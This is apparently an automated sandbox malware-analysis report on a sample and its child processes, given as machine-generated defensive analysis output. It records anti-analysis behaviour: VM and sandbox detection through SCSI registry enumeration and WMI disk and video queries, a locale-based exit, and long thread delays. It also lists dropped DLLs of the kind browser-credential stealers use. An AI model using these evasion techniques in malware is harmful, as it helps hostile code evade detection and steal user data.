Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5c4.3.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found evasive API chain (may stop execution after checking locale)

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe

Evasive API call chain: GetUserDefaultLangID, ExitProcess

graph_1-56987

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\root\cimv2:Win32_DiskPartition.DeviceID="Disk #0, Partition #1"} where resultclass = Win32_DiskDrive
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_DiskDriveToDiskPartition where Dependent="Win32_DiskPartition.DeviceID=\"Disk #0, Partition #1\""

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_LogicalDisk where DeviceId = 'C:'
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : associators of {\\user-PC\ROOT\cimv2:Win32_LogicalDisk.DeviceID="C:"} where resultclass = Win32_DiskPartition
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_LogicalDiskToPartition where Dependent="Win32_LogicalDisk.DeviceID=\"C:\""

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_VideoController

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 1160000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2C70000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 11D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Memory allocated: 240F5580000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Memory allocated: 240F70A0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: EE0000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 2810000 memory reserve \| memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Memory allocated: 4810000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 4147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Window / User API: threadDelayed 5298
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 2852
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 5685
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Window / User API: threadDelayed 1005

Source: C:\Users\user\Desktop\kO1P1YnLst.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

graph_0-39196

Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5c4.2\UIxMarketPlugin.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\khjsru	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\kO1P1YnLst.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\u5c4.2\relay.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\pasb	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\kO1P1YnLst.exe	API coverage: 9.8 %
Source: C:\Users\user\AppData\Local\Temp\u5c4.0.exe	API coverage: 6.7 %
Source: C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe	API coverage: 1.8 %

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 8148	Thread sleep time: -28592453314249787s >= -30000s
